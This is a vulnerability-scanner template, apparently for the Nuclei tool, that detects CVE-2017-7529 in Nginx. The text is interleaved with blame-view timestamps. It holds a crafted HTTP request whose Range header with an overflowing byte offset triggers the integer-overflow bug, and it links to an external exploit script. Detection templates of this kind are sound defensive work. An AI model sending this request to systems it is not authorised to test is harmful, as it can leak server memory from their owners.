2020-06-30 11:14:33 +00:00
|
|
|
id: CVE-2017-7529
|
2020-06-30 11:24:48 +00:00
|
|
|
info:
|
2020-06-30 11:14:33 +00:00
|
|
|
author: "Harsh Bothra"
|
|
|
|
name: "Nginx Remote Integer Overflow"
|
|
|
|
severity: medium
|
|
|
|
|
|
|
|
# This template supports the detection part only.
|
|
|
|
# Do not test any website without permission
|
|
|
|
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
|
|
|
|
|
2020-06-30 11:24:48 +00:00
|
|
|
requests:
|
|
|
|
- raw:
|
2020-06-30 11:14:33 +00:00
|
|
|
- |
|
|
|
|
GET / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Range: bytes=-17208,-9223372036854758792
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Connection: close
|
2020-07-06 08:27:46 +00:00
|
|
|
|
2020-07-06 08:24:03 +00:00
|
|
|
matchers-condition: and
|
2020-06-30 11:14:33 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 206
|
2020-07-06 08:24:03 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- nginx
|
|
|
|
part: header
|